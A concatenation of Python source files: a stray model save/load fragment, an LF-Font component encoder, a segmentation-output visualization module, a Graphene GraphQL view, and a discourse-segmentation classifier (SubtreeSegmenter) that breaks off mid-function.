save_folder = os.path.join("test", model_name, data_name + '-' + run_name)
model.save(epoch=0, path=save_folder)
model.load(path=save_folder)
print('')
|
py | 1a32fd16b6aef4b749aba5d84cfb89c2df077906 | """
LF-Font
Copyright (c) 2020-present NAVER Corp.
MIT license
"""
from functools import partial
import torch.nn as nn
import torch
from base.modules import ConvBlock, ResBlock, GCBlock, CBAM
class ComponentConditionBlock(nn.Module):
def __init__(self, in_shape, n_comps):
super().__init__()
self.in_shape = in_shape
self.bias = nn.Parameter(torch.zeros(n_comps, in_shape[0], 1, 1), requires_grad=True)
def forward(self, x, comp_id=None):
out = x
if comp_id is not None:
b = self.bias[comp_id]
out += b
return out
class ComponentEncoder(nn.Module):
def __init__(self, n_comps):
super().__init__()
ConvBlk = partial(ConvBlock, norm="in", activ="relu", pad_type="zero")
ResBlk = partial(ResBlock, norm="in", activ="relu", pad_type="zero", scale_var=False)
C = 32
self.layers = nn.ModuleList([
ConvBlk(1, C, 3, 1, 1, norm='none', activ='none'), # 128x128
ConvBlk(C*1, C*2, 3, 1, 1, downsample=True), # 64x64
GCBlock(C*2),
ConvBlk(C*2, C*4, 3, 1, 1, downsample=True), # 32x32
CBAM(C*4),
ComponentConditionBlock((128, 32, 32), n_comps),
ResBlk(C*4, C*4, 3, 1),
CBAM(C*4),
ResBlk(C*4, C*4, 3, 1),
ResBlk(C*4, C*8, 3, 1, downsample=True), # 16x16
CBAM(C*8),
ResBlk(C*8, C*8)
])
self.skip_layer_idx = 8
self.feat_shape = {"last": (C*8, 16, 16), "skip": (C*4, 32, 32)}
def forward(self, x, *comp_id):
x = x.repeat((1, 1, 1, 1))
ret_feats = {}
for lidx, layer in enumerate(self.layers):
if isinstance(layer, ComponentConditionBlock):
x = layer(x, *comp_id)
else:
x = layer(x)
if lidx == self.skip_layer_idx:
ret_feats["skip"] = x
ret_feats["last"] = x
ret_feats = {k: nn.Sigmoid()(v) for k, v in ret_feats.items()}
return ret_feats
def get_feat_shape(self):
return self.feat_shape
|
py | 1a32fd47125e4ef9677d4ef7216abce0b9236583 | import logging
import math
import re
import warnings
from pathlib import Path
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image
from matplotlib import pyplot as plt, gridspec, cm, colors
import csv
from utils.utils import unscale, unnormalize, get_key_def
from utils.geoutils import create_new_raster_from_base
import matplotlib
matplotlib.use('Agg')
logging.getLogger(__name__)
def grid_vis(input_, output, heatmaps_dict, label=None, heatmaps=True):
""" Create a grid with PIL images and titles
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor, e.g. as returned by dataloader
:param heatmaps_dict: (dict) Dictionary of heatmaps where key is grayscale value of class and value a dict {'class_name': (str), 'heatmap_PIL': (PIL object))
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader (optional)
:param heatmaps: (bool) if True, include heatmaps in grid
:return: Saves .png to disk
"""
list_imgs_pil = [input_, label, output] if label is not None else [input_, output]
list_titles = ['input', 'label', 'output'] if label is not None else ['input', 'output']
num_tiles = (len(list_imgs_pil) + len(heatmaps_dict))
height = math.ceil(num_tiles/4)
width = num_tiles if num_tiles < 4 else 4
plt.figure(figsize=(width*6, height*6))
grid_spec = gridspec.GridSpec(height, width)
if heatmaps:
for key in heatmaps_dict.keys():
list_imgs_pil.append(heatmaps_dict[key]['heatmap_PIL'])
list_titles.append(heatmaps_dict[key]['class_name'])
assert len(list_imgs_pil) == len(list_titles)
for index, zipped in enumerate(zip(list_imgs_pil, list_titles)):
img, title = zipped
plt.subplot(grid_spec[index])
plt.imshow(img)
plt.grid(False)
plt.axis('off')
plt.title(title)
plt.tight_layout()
return plt
def vis_from_batch(vis_params,
inputs,
outputs,
batch_index,
vis_path,
labels=None,
dataset='',
ep_num=0,
scale=None,
debug=False):
""" Provide indiviual input, output and label from batch to visualization function
:param vis_params: (Dict) parameters useful during visualization
:param inputs: (tensor) inputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param outputs: (tensor) outputs as pytorch tensors with dimensions (batch_size, channels, width, height)
:param batch_index: (int) index of batch inside epoch
:param vis_path: path where visualisation images will be saved
:param labels: (tensor) labels as pytorch tensors with dimensions (batch_size, channels, width, height)
:param dataset: name of dataset for file naming purposes (ex. 'tst')
:param ep_num: (int) number of epoch for file naming purposes
:param debug: (bool) if True, some debug features will be activated
:return:
"""
labels = [None]*(len(outputs)) if labels is None else labels # Creaty empty list of labels to enable zip operation below if no label
for batch_samp_index, zipped in enumerate(zip(inputs, labels, outputs)):
epoch_samp_index = batch_samp_index + len(inputs) * batch_index
input_, label, output = zipped
vis(vis_params, input_, output,
vis_path=vis_path,
sample_num=epoch_samp_index+1,
label=label,
dataset=dataset,
ep_num=ep_num,
scale=scale,
debug=debug)
def vis(vis_params,
input_,
output,
vis_path,
sample_num=0,
label=None,
dataset='',
ep_num=0,
inference_input_path=None,
scale=None,
debug=False):
"""saves input, output and label (if given) as .png in a grid or as individual pngs
:param input_: (tensor) input array as pytorch tensor, e.g. as returned by dataloader
:param output: (tensor) output array as pytorch tensor before argmax, e.g. as returned by dataloader
:param vis_path: path where visualisation images will be saved
:param sample_num: index of sample if function is from for loop iterating through a batch or list of images.
:param label: (tensor) label array as pytorch tensor, e.g. as returned by dataloader. Optional.
:param dataset: (str) name of dataset arrays belong to. For file-naming purposes only.
:param ep_num: (int) number of epoch arrays are inputted from. For file-naming purposes only.
:param inference_input_path: (Path) path to input image on which inference is being performed. If given, turns «inference» bool to True below.
:return: saves color images from input arrays as grid or as full scale .png
"""
# TODO: Temporary fix, need to be discuss, `input_` is a list if the initial input as NIR with the RGB at [0].
# The `squeeze` fonction cut the useless dimension, append in inference.
input_ = np.squeeze(input_[0]) if type(input_) is list else np.squeeze(input_)
assert vis_path.parent.is_dir()
vis_path.mkdir(exist_ok=True)
single_class_mode = False
if not vis_params[
'inference_input_path']: # FIXME: function parameters should not come in as different types if inference or not.
input_ = input_.cpu().permute(1, 2, 0).numpy() # channels last
if output.shape[0] == 1:
output = torch.sigmoid(output) # use sigmoid for single class
single_class_mode = True
else:
output = F.softmax(output, dim=0) # use softmax for multiclass (note: not applied for inference)
output = output.detach().cpu().permute(1, 2, 0).numpy() # channels last
if label is not None:
label_copy = label.cpu().numpy().copy()
if vis_params['ignore_index'] < 0:
new_ignore_index = 255
# Convert all pixels with ignore_index values to 255 to make sure it is last in order of values.
label_copy[label_copy == vis_params['ignore_index']] = new_ignore_index
if vis_params['mean'] and vis_params['std']:
input_ = unnormalize(input_img=input_, mean=vis_params['mean'], std=vis_params['std'])
input_ = unscale(img=input_, float_range=(scale[0], scale[1]), orig_range=(0, 255)) if scale else input_
mode = 'RGB' # https://pillow.readthedocs.io/en/3.1.x/handbook/concepts.html#concept-modes
if 1 <= input_.shape[2] <= 2:
input_ = np.squeeze(input_[:, :, :1], axis=2) # take first band (will become grayscale image)
mode = 'L'
elif input_.shape[2] >= 3:
input_ = input_[:, :, :3] # take three first bands assuming they are RGB in correct order
input_PIL = Image.fromarray(input_.astype(np.uint8), mode=mode) # TODO: test this with grayscale input.
# Give value of class to band with highest value in final inference
if single_class_mode:
output_acv = np.squeeze(output, axis=2).astype(np.uint8)
else:
output_acv = np.argmax(output, axis=2).astype(np.uint8) # Flatten along channels axis. Convert to 8bit
# Define colormap and names of classes with respect to grayscale values
classes, cmap = colormap_reader(output, vis_params['colormap_file'], default_colormap='Set1')
heatmaps_dict = heatmaps_to_dict(output, classes, inference=inference_input_path,
debug=debug) # Prepare heatmaps from softmax output
# Convert output and label, if provided, to RGB with matplotlib's colormap object
output_acv_color = cmap(output_acv)
output_acv_PIL = Image.fromarray((output_acv_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
if not inference_input_path and label is not None:
label_color = cmap(label_copy)
label_PIL = Image.fromarray((label_color[:, :, :3] * 255).astype(np.uint8), mode='RGB')
else:
label_PIL = None
if inference_input_path is not None:
if debug and len(np.unique(output_acv)) == 1:
warnings.warn(f'Inference contains only {np.unique(output_acv)} value. Make sure data scale '
f'{scale} is identical with scale used for training model.')
output_name = vis_path.joinpath(f"{inference_input_path.stem}_inference.tif")
create_new_raster_from_base(inference_input_path, output_name, output_acv)
if vis_params['heatmaps_inf']:
for key in heatmaps_dict.keys():
heatmap = np.array(heatmaps_dict[key]['heatmap_PIL'])
class_name = heatmaps_dict[key]['class_name']
heatmap_name = vis_path.joinpath(f"{inference_input_path.stem}_inference_heatmap_{class_name}.tif")
create_new_raster_from_base(inference_input_path, heatmap_name, heatmap)
elif vis_params['grid']: # SAVE PIL IMAGES AS GRID
grid = grid_vis(input_PIL, output_acv_PIL, heatmaps_dict, label=label_PIL, heatmaps=vis_params['heatmaps'])
grid.savefig(vis_path.joinpath(f'{dataset}_{sample_num:03d}_ep{ep_num:03d}.png'))
plt.close()
else: # SAVE PIL IMAGES DIRECTLY TO FILE
if not vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg').is_file():
input_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_satimg.jpg'))
if not inference_input_path and label is not None:
label_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_label.png')) # save label
output_acv_PIL.save(vis_path.joinpath(f'{dataset}_{sample_num:03d}_output_ep{ep_num:03d}.png'))
if vis_params['heatmaps']: # TODO: test this.
for key in heatmaps_dict.keys():
heatmap = heatmaps_dict[key]['heatmap_PIL']
class_name = heatmaps_dict[key]['class_name']
heatmap.save(vis_path.joinpath(f"{dataset}_{sample_num:03d}_output_ep{ep_num:03d}_heatmap_{class_name}.png")) # save heatmap
def heatmaps_to_dict(output, classes=[], inference=False, debug=False):
''' Store heatmap into a dictionary
:param output: softmax tensor
:return: dictionary where key is value of class and value is numpy array
'''
heatmaps_dict = {}
classes = range(output.shape[2]) if len(classes) == 0 else classes
for i in range(output.shape[2]): # for each channel (i.e. class) in output
perclass_output = output[:, :, i]
if inference: # Don't color heatmap if in inference
if debug:
logging.info(f'Heatmap class: {classes[i]}\n')
logging.info(f'List of unique values in heatmap: {np.unique(np.uint8(perclass_output * 255))}\n')
perclass_output_PIL = Image.fromarray(np.uint8(perclass_output*255))
else: # https://stackoverflow.com/questions/10965417/how-to-convert-numpy-array-to-pil-image-applying-matplotlib-colormap
perclass_output_PIL = Image.fromarray(np.uint8(cm.get_cmap('inferno')(perclass_output) * 255))
heatmaps_dict[i] = {'class_name': classes[i], 'heatmap_PIL': perclass_output_PIL}
return heatmaps_dict
def colormap_reader(output, colormap_path=None, default_colormap='Set1'):
"""
:param colormap_path: csv file (with header) containing 3 columns (input grayscale value, classes, html colors (#RRGGBB))
:return: list of classes and list of html colors to map to grayscale values associated with classes
"""
if colormap_path is not None:
assert Path(colormap_path).is_file(), f'Could not locate {colormap_path}'
input_val = []
classes_list = ['background']
html_colors = ['#000000']
with open(colormap_path, 'rt') as file:
reader = csv.reader(file)
next(reader) # Skip header
rows = list(reader)
input_val.extend([int(row[0]) for row in rows])
csv_classes = [row[1] for row in rows] # Take second element in row. Should be class name
csv_html_colors = [row[2] for row in rows] # Take third element in row. Should be hex color code
sorted_classes = [x for _, x in sorted(zip(input_val, csv_classes))] # sort according to grayscale values order
sorted_colors = [x for _, x in sorted(zip(input_val, csv_html_colors))]
for color in sorted_colors:
match = re.search(r'^#(?:[0-9a-fA-F]{3}){1,2}$', color)
assert match, f'Submitted color {color} does not match HEX color code pattern'
classes_list.extend(sorted_classes)
html_colors.extend(sorted_colors)
assert len(html_colors) == len(classes_list) >= output.shape[2], f'Not enough colors and class names for number of classes in output'
html_colors.append('white') # for ignore_index values in labels. #TODO: test this with a label containt ignore_index values
cmap = colors.ListedColormap(html_colors)
else:
classes_list = list(range(0, output.shape[2])) # TODO: since list of classes are only useful for naming each heatmap, this list could be inside the heatmaps_dict, e.g. {1: {heatmap: perclass_output_PIL, class_name: 'roads'}, ...}
cmap = cm.get_cmap(default_colormap)
return classes_list, cmap
|
py | 1a32fffd79b80fc2a5a7e6ce23256163d64efc3b | from graphene_django.views import GraphQLView
from .schema import schema as movie_schema
class MovieView(GraphQLView):
graphiql = True
schema = movie_schema
|
py | 1a3300c0e098310dd9ab219f06c487c17b3e7e01 | """
SubtreeSegmenter.py
A discourse unit segmentation module based on a moving window capturing parts of
a dependency syntax parse.
"""
import io, sys, os, copy
# Allow package level imports in module
script_dir = os.path.dirname(os.path.realpath(__file__))
lib = os.path.abspath(script_dir + os.sep + "..")
models = os.path.abspath(script_dir + os.sep + ".."+os.sep+".."+os.sep + "models")
sys.path.append(lib)
from collections import defaultdict, Counter
from argparse import ArgumentParser
#os.environ['OMP_NUM_THREADS'] = "1"
import numpy as np
import pandas as pd
from sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier, GradientBoostingClassifier
from sklearn.externals import joblib
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import GridSearchCV
from xgboost import XGBClassifier
from conll_reader import read_conll, get_multitrain_preds
from tune import permutation_importances, report_correlations, report_theils_u, get_best_params, get_best_score, hyper_optimize, grid_search
np.random.seed(42)
import random
random.seed(42)
DEFAULTCLF = RandomForestClassifier(random_state=42)
DEFAULTCLF = XGBClassifier(random_state=42, max_depth=50, min_child_weight=1, n_estimators=200, n_jobs=3 , verbose=1,learning_rate=0.16)
DEFAULTPARAMS = {"n_estimators":250,"min_samples_leaf":3,"max_features":10,"random_state":42}
class SubtreeSegmenter:
def __init__(self,lang="eng",model=None,multifolds=5,auto=""):
self.name = "SubtreeSegmenter"
self.genre_pat = "^(..)" # By default 2 first chars of docname identify genre
if "gum" in model:
self.genre_pat = "GUM_([^_]+)_"
self.lang = lang
self.multifolds = multifolds
self.corpus = model
self.auto = auto
if model is not None:
self.model = models + os.sep + model + auto + "_subtreeseg.pkl"
else:
self.model = ".." + os.sep + ".." + os.sep + "models" + os.sep + auto + "subtreeseg.pkl"
self.corpus_dir = None
self.clf = DEFAULTCLF
def read_data(self,infile,size,as_text,rare_thresh,chosen_feats=None):
cap = 3*size if size is not None else None
train_feats, vocab, toks, firsts, lasts = read_conll(infile,genre_pat=self.genre_pat,mode="seg",cap=cap,char_bytes=self.lang=="zho",as_text=as_text)
vocab = Counter(vocab)
top_n_words = vocab.most_common(rare_thresh)
top_n_words, _ = zip(*top_n_words)
for tok in train_feats:
if tok["word"] not in top_n_words:
tok["word"] = tok["pos"]
tokens_by_abs_id = self.traverse_trees(train_feats)
data, headers = self.n_gram(train_feats,tokens_by_abs_id)
# Features to use for all n-gram tokens
num_labels = ["head_dist","left_span","right_span","samepar_left","tok_len"]
cat_labels = ["case","closest_left","closest_right","deprel","farthest_left","farthest_right","pos","word","morph","cpos","depchunk"]
pref_cat = []
pref_num = []
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
pref_cat += [pref + "_" + h for h in cat_labels]
pref_num += [pref + "_" + h for h in num_labels]
# Features only needed for node token
cat_labels += ["genre"] + pref_cat #+ ["heading_first","heading_last"]#+ ["s_type"]
num_labels += ["dist2end","sent_doc_percentile","tok_id","wid","quote","rank"] + pref_num # + ["bracket"]
num_labels += ["par_quote","par_par_quote"]#,"par_bracket","par_par_bracket"]
# Use specific feature subset
if chosen_feats is not None:
new_cat = []
new_num = []
for feat in chosen_feats:
if feat in cat_labels:
new_cat.append(feat)
elif feat in num_labels:
new_num.append(feat)
cat_labels = new_cat
num_labels = new_num
data = pd.DataFrame(data, columns=headers)
data_encoded, multicol_dict = self.multicol_fit_transform(data, pd.Index(cat_labels))
data_x = data_encoded[cat_labels+num_labels].values
data_y = np.where(data_encoded['label'] == "_", 0, 1)
return data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words
def train(self,training_file,rare_thresh=200,clf_params=None,chosen_feats=None,tune_mode=None,size=None,as_text=True,multitrain=False,chosen_clf=DEFAULTCLF):
"""
:param training_file:
:param rare_thresh:
:param clf_params:
:param chosen_feats: List of feature names to force a subset of selected features to be used
:param tune_mode: None for no grid search, "paramwise" to tune each hyperparameter separately, or "full" for complete grid (best but slowest)
:param size: Sample size to optimize variable importance with
:return:
"""
if tune_mode is not None and size is None:
size = 5000
sys.stderr.write("o No sample size set - setting size to 5000\n")
if clf_params is None:
# Default classifier parameters
clf_params = {"n_estimators":150,"min_samples_leaf":3, "random_state":42}
if DEFAULTCLF.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf_params.update({"n_jobs":4, "oob_score":True, "bootstrap":True})
data_encoded, data_x, data_y, cat_labels, num_labels, multicol_dict, firsts, lasts, top_n_words = self.read_data(training_file,size,as_text=as_text,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
sys.stderr.write("o Learning...\n")
if tune_mode is not None:
# Randomly select |size| samples for training and leave rest for validation, max |size| samples
data_x = data_encoded[cat_labels+num_labels+["label"]].sample(frac=1,random_state=42)
data_y = np.where(data_x['label'] == "_", 0, 1)
data_x = data_x[cat_labels+num_labels]
if len(data_y) > 2*size:
val_x = data_x[size:2*size]
val_y = data_y[size:2*size]
else:
val_x = data_x[size:]
val_y = data_y[size:]
data_x = data_x[:size]
data_y = data_y[:size]
if tune_mode == "importances":
sys.stderr.write("o Measuring correlation of categorical variables\n")
theil_implications = report_theils_u(val_x,cat_labels)
for (var1, var2) in theil_implications:
if var1 in cat_labels and var2 in cat_labels and var2 !="word":
drop_var = var2
u = theil_implications[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to Theil's U " + str(u)[:6] + " of " + var1 + "->" + var2 + "\n")
cat_labels.remove(drop_var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels],thresh=0.95)
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 # if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
if tune_mode in ["paramwise","full"]: # Grid Search
best_clf, best_params = grid_search(data_x,data_y,tune_mode,clf_params)
clf_name = best_clf.__class__.__name__
self.clf = best_clf
return best_clf, best_params
elif tune_mode == "hyperopt": # TPE guided random search
from hyperopt import hp
from hyperopt.pyll.base import scope
val_x, val_y = None, None
if self.corpus_dir is not None:
dev_file = self.corpus_dir + os.sep + self.corpus + "_dev.conll"
_, val_x, val_y, _, _, _, _, _, _ = self.read_data(dev_file,size,as_text=False,rare_thresh=rare_thresh,chosen_feats=chosen_feats)
space = {
'n_estimators': scope.int(hp.quniform('n_estimators', 100, 250, 10)),
'max_depth': scope.int(hp.quniform('max_depth', 3, 30, 1)),
'eta': scope.float(hp.quniform('eta', 0.01, 0.2, 0.01)),
'gamma': scope.float(hp.quniform('gamma', 0.01, 0.2, 0.01)),
'colsample_bytree': hp.choice('colsample_bytree', [0.4,0.5,0.6,0.7,1.0]),
'subsample': hp.choice('subsample', [0.5,0.6,0.7,0.8,1.0]),
'clf': hp.choice('clf', ["xgb"])
}
best_clf, best_params = hyper_optimize(data_x.values,data_y,val_x=None,val_y=None,space=space,max_evals=20)
return best_clf, best_params
else: # No hyperparameter optimization
clf = chosen_clf if chosen_clf is not None else DEFAULTCLF
sys.stderr.write("o Setting params " + str(clf_params) + "\n")
clf.set_params(**clf_params)
if clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
clf.set_params(**{"n_jobs":3,"oob_score":True,"bootstrap":True})
if clf.__class__.__name__ in ["XGBClassifier"]:
clf.set_params(**{"n_jobs":3})
clf.set_params(**{"random_state":42})
if multitrain:
multitrain_preds = get_multitrain_preds(clf,data_x,data_y,self.multifolds)
multitrain_preds = "\n".join(multitrain_preds.strip().split("\n")[1:-1]) # Remove OOV tokens at start and end
with io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus,'w',newline="\n") as f:
sys.stderr.write("o Serializing multitraining predictions\n")
f.write(multitrain_preds)
if clf.__class__.__name__ == "CatBoostClassifier":
clf.fit(data_x,data_y,cat_features=list(range(len(cat_labels))))
else:
clf.fit(data_x,data_y)
self.clf = clf
feature_names = cat_labels + num_labels
sys.stderr.write("o Using " + str(len(feature_names)) + " features\n")
zipped = zip(feature_names, clf.feature_importances_)
sorted_zip = sorted(zipped, key=lambda x: x[1], reverse=True)
sys.stderr.write("o Feature Gini importances:\n\n")
for name, importance in sorted_zip:
sys.stderr.write(name + "=" + str(importance) + "\n")
if self.clf.__class__.__name__ not in ["GradientBoostingClassifier","CatBoostClassifier","XGBClassifier"]:
sys.stderr.write("\no OOB score: " + str(clf.oob_score_)+"\n\n")
if tune_mode=="permutation":
# Filter features based on permutation importance score threshold
imp = permutation_importances(clf,val_x,val_y)
for var, score in imp.items():
if score < 0 and var != "word":
sys.stderr.write("o Dropping feature " + var + " due to low permutation importance of " + str(score) + "\n")
if var in cat_labels:
cat_labels.remove(var)
elif var in num_labels:
num_labels.remove(var)
sys.stderr.write("o Measuring correlation of numerical variables\n")
cor_mat = report_correlations(val_x[num_labels])
for (var1, var2) in cor_mat:
if var1 in num_labels and var2 in num_labels:
drop_var = var2 if imp[var1] > imp[var2] else var1
if drop_var == "word":
continue
corr_level = cor_mat[(var1, var2)]
sys.stderr.write("o Removed feature " + drop_var + " due to correlation " + str(corr_level) + " of " + var1 + ":" + var2 + "\n")
num_labels.remove(drop_var)
return cat_labels, num_labels
sys.stderr.write("\no Serializing model...\n")
joblib.dump((clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts), self.model, compress=3)
def predict_cached(self,train=None):
pairs = io.open(script_dir + os.sep + "multitrain" + os.sep + self.name + self.auto + '_' + self.corpus).read().split("\n")
preds = [(int(pr.split()[0]), float(pr.split()[1])) for pr in pairs if "\t" in pr]
return preds
def predict(self, infile, eval_gold=False, as_text=True):
"""
Predict sentence splits using an existing model
:param infile: File in DISRPT shared task *.tok or *.conll format (sentence breaks will be ignored in .conll)
:param eval_gold: Whether to score the prediction; only applicable if using a gold .conll file as input
:param genre_pat: A regex pattern identifying the document genre from document name comments
:param as_text: Boolean, whether the input is a string, rather than a file name to read
:return: tokenwise binary prediction vector if eval_gold is False, otherwise prints evaluation metrics and diff to gold
"""
if self.model is None: # Try default model location
model_path = ".." + os.sep + ".." + os.sep + "models" + os.sep + "subtreeseg.pkl"
else:
model_path = self.model
clf, num_labels, cat_labels, multicol_dict, top_n_words, firsts, lasts = joblib.load(model_path)
feats, _, toks, _, _ = read_conll(infile,genre_pat=self.genre_pat,mode="seg",as_text=as_text,char_bytes=self.lang=="zho")
tokens_by_abs_id = self.traverse_trees(feats)
feats, headers = self.n_gram(feats,tokens_by_abs_id,dummies=False)
temp = []
headers_with_oov = ["first","last","deprel","closest_left","closest_right","farthest_left","farthest_right",
"pos","cpos","morph","s_type","depchunk"]
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
temp += [pref + "_" + h for h in headers_with_oov]
headers_with_oov += temp
genre_warning = False
for i, header in enumerate(headers):
if header in headers_with_oov and header in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"][header].classes_:
item[i] = "_"
elif header == "genre" and "genre" in cat_labels:
for item in feats:
if item[i] not in multicol_dict["encoder_dict"]["genre"].classes_: # New genre not in training data
if not genre_warning:
sys.stderr.write("! WARN: Genre not in training data: " + item[i] + "; suppressing further warnings\n")
genre_warning = True
item[i] = "_"
elif header.endswith("word") and header in cat_labels:
for item in feats:
# Replace rare words and words never seen before in this position with POS
if item[i] not in top_n_words or item[i] not in multicol_dict["encoder_dict"][header].classes_:
pos_col = headers.index(header.replace("word","pos"))
if item[pos_col] in multicol_dict["encoder_dict"][header].classes_:
item[i] = item[pos_col]
else:
item[i] = "_"
data = feats
data = pd.DataFrame(data, columns=headers)
data_encoded = self.multicol_transform(data,columns=multicol_dict["columns"],all_encoders_=multicol_dict["all_encoders_"])
data_x = data_encoded[cat_labels+num_labels].values
probas = clf.predict_proba(data_x)
probas = [p[1] for p in probas]
preds = [int(p>0.5) for p in probas]
for i, p in enumerate(preds):
if data["tok_id"].values[i] == 1: # Ensure tok_id 1 is always a segment start
preds[i] = 1
if eval_gold:
gold = np.where(data_encoded['label'] == "_", 0, 1)
conf_mat = confusion_matrix(gold, preds)
sys.stderr.write(str(conf_mat) + "\n")
true_positive = conf_mat[1][1]
false_positive = conf_mat[0][1]
false_negative = conf_mat[1][0]
prec = true_positive / (true_positive + false_positive)
rec = true_positive / (true_positive + false_negative)
f1 = 2*prec*rec/(prec+rec)
sys.stderr.write("P: " + str(prec) + "\n")
sys.stderr.write("R: " + str(rec) + "\n")
sys.stderr.write("F1: " + str(f1) + "\n")
with io.open("diff.tab",'w',encoding="utf8") as f:
for i in range(len(gold)):
f.write("\t".join([toks[i],str(gold[i]),str(preds[i])])+"\n")
return conf_mat, prec, rec, f1
else:
return zip(preds,probas)
def optimize(self, train, rare_thresh=200, size=5000, tune_mode="paramwise",as_text=False, cached_params=False):
# Estimate useful features on a random sample of |size| instances
selected_cat, selected_num = self.train(train,rare_thresh=rare_thresh,tune_mode="importances",size=size,as_text=as_text)
selected_feats = selected_cat + selected_num
with io.open(script_dir + os.sep + "SubtreeSegmenter_best_params"+self.auto+".tab",'a',encoding="utf8") as bp:
bp.write(self.corpus + "\t"+self.clf.__class__.__name__+"\tfeatures\t" + ",".join(selected_feats)+"\n")
sys.stderr.write("o Chose "+str(len(selected_feats))+" features: " + ",".join(selected_feats)+"\n")
if tune_mode != "features":
sys.stderr.write("o Tuning hyperparameters\n\n")
# Optimize hyperparameters via grid search
if cached_params:
best_clf, best_params, _ = get_best_params(self.corpus, self.name)
sys.stderr.write("\no Using cached best hyperparameters\n")
elif tune_mode!="features":
best_clf, best_params = self.train(train,rare_thresh=rare_thresh,tune_mode=tune_mode,size=200000,as_text=as_text, chosen_feats=selected_feats)
sys.stderr.write("\no Found best hyperparameters\n")
else:
best_clf = DEFAULTCLF
best_params = DEFAULTPARAMS
sys.stderr.write("\no Using default hyperparameters\n")
for key, val in best_params.items():
sys.stderr.write(key + "\t" + str(val) + "\n")
sys.stderr.write(best_clf.__class__.__name__ + "\n")
sys.stderr.write("\n")
return best_clf, selected_feats, best_params
@staticmethod
def traverse_trees(tokens):
tokens_by_abs_id = {}
def get_descendants(parent_id, children_dict, seen_tokens):
# Helper function to recursively collect children of children
my_descendants = []
my_descendants += children_dict[parent_id]
for child in children_dict[parent_id]:
if child["abs_id"] in seen_tokens:
sys.stderr.write("\nCycle detected in syntax tree in sentence " + str(child["s_id"])+" token: "+child["word"]+"\n")
sys.exit("Exiting due to invalid input\n")
else:
seen_tokens.add(child["abs_id"])
for child in children_dict[parent_id]:
child_id = child["abs_id"]
if child_id in children_dict:
my_descendants += get_descendants(child_id, children_dict, seen_tokens)
return my_descendants
def get_rank(tok, token_dict, rank=0):
# Helper function to determine tokens' graph depth
if tok["abs_parent"].endswith("_0"):
return rank
else:
rank+=1
return get_rank(token_dict[tok["abs_parent"]],token_dict,rank=rank)
# Make unique ids
for tok in tokens:
tok["abs_id"] = str(tok["s_id"]) + "_" + str(tok["wid"])
tok["abs_parent"] = str(tok["s_id"]) + "_" + str(tok["head"])
tok["descendants"] = [] # Initialize descendant list
tokens_by_abs_id[str(tok["s_id"]) + "_" + str(tok["wid"])] = tok
# Add dist2end feature (=reverse id)
for tok in tokens:
tok["dist2end"] = tok["s_len"]-tok["wid"]
# Make children dict
children = defaultdict(list)
for tok in tokens:
if not tok["abs_parent"].endswith("_0"):
children[tok["abs_parent"]].append(tok)
# Recursively get descendants
for parent_id in children:
seen_tokens = set()
parent = tokens_by_abs_id[parent_id]
parent["descendants"] = get_descendants(parent_id, children, seen_tokens)
# Compute graph rank for each token
for tok in tokens:
tok["rank"] = get_rank(tok, tokens_by_abs_id, 0)
# Use descendant dictionary to find closest/farthest left/right children's network
for tok in tokens:
tok["farthest_left"] = tok
tok["farthest_right"] = tok
tok["closest_right"] = tok
tok["closest_left"] = tok
tok["right_span"] = 0
tok["left_span"] = 0
d_list = sorted(tok["descendants"],key=lambda x: x["tok_id"])
for d in d_list:
d_id = d["tok_id"]
t_id = tok["tok_id"]
if d_id < t_id: # Left child
if d_id < int(tok["farthest_left"]["tok_id"]):
tok["farthest_left"] = d
# tok["left_span"] = self.bin_numbers(tok["left_span"] ,bin_splits=[-6,-3,-1,0,1,2,4,7])
tok["left_span"] = int(tok["tok_id"]) - int(d["tok_id"])
if (d_id > int(tok["closest_left"]["tok_id"]) and d_id < tok["tok_id"]) or (d_id < tok["tok_id"] and tok["closest_left"] == tok):
tok["closest_left"] = d
else: # Right child
if d_id > int(tok["farthest_right"]["tok_id"]):
tok["farthest_right"] = d
tok["right_span"] = int(d["tok_id"]) - int(tok["tok_id"])
if (d_id < tok["closest_right"]["tok_id"] and d_id > tok["tok_id"]) or (d_id > tok["tok_id"] and tok["closest_right"] == tok):
tok["closest_right"] = d
# Represent child network as deprels
for prop in ["closest_right","closest_left","farthest_right","farthest_left"]:
if tok[prop] == tok:
tok[prop] = "_"
else:
tok[prop] = tok[prop]["deprel"]
# Add same parent features (whether a token has the same parent as its right/left neighbors)
tokens[0]["samepar_left"] = 0
tokens[-1]["samepar_right"] = 0
for i in range(1,len(tokens)-1):
prev, tok, next = tokens[i-1], tokens[i], tokens[i+1]
if prev["abs_parent"] == tok["abs_parent"]:
prev["samepar_right"] = 1
tok["samepar_left"] = 1
else:
prev["samepar_right"] = 0
tok["samepar_left"] = 0
if next["abs_parent"] == tok["abs_parent"]:
tok["samepar_right"] = 1
next["samepar_left"] = 1
else:
